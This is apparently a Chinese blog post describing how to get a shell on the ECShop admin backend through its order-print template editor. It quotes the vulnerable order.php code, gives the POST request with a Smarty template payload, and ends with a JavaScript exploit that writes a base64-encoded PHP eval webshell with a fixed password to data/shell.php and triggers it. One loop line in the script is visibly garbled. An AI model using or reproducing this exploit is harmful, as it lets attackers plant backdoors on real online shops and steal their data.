ECSHOP 后台getshell

admin/order.php
[php]
elseif ($_REQUEST['act'] == 'edit_templates')

{

/* 更新模板文件的内容 */

$file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+'); //写出模板,,只要有一个调用模板就可以getshell了

echo '../' . DATA_DIR . '/order_print.html';

echo stripslashes($_POST['FCKeditor1']);

@fwrite($file_name, stripslashes($_POST['FCKeditor1']));

@fclose($file_name);

/* 提示信息 */

$link[] = array('text' => $_LANG['back_list'], 'href'=>'order.php?act=list');

sys_msg($_LANG['edit_template_success'], 0, $link);

}

elseif ($_REQUEST['act'] == 'info')

{

省略若干

assign_query_info();

$smarty->display('order_info.htm');

}
}
[/php]
我们只要先提交
127.0.0.1/ec/admin/order.php?act=edit_templates
POST 内容
FCKeditor1={if phpinfo()}{/if}
然后随便查看一个订单
点击打印
就可以getshell了
ecshop1
ecshop2
附带一个javascript的脚本
[php]
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
POSTa();

function POSTa(){
var postStr="FCKeditor1={if%20$fp%20=%20fopen(%22../data/shell.php%22,%20%27ab%27)}{/if}{if%20flock($fp, LOCK_EX)}{/if}{if%20fwrite($fp,%20base64_decode(%27PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz5z%27))}{/if}{if fclose($fp)}{/if}";//../data/shell.php为生成的一句话路径,密码为207
xmlhttp.open("POST", "./order.php?act=edit_templates", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postStr.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postStr);
}

new Image().src="./order.php?act=info&order_id=1&print=1";[/php]

发表评论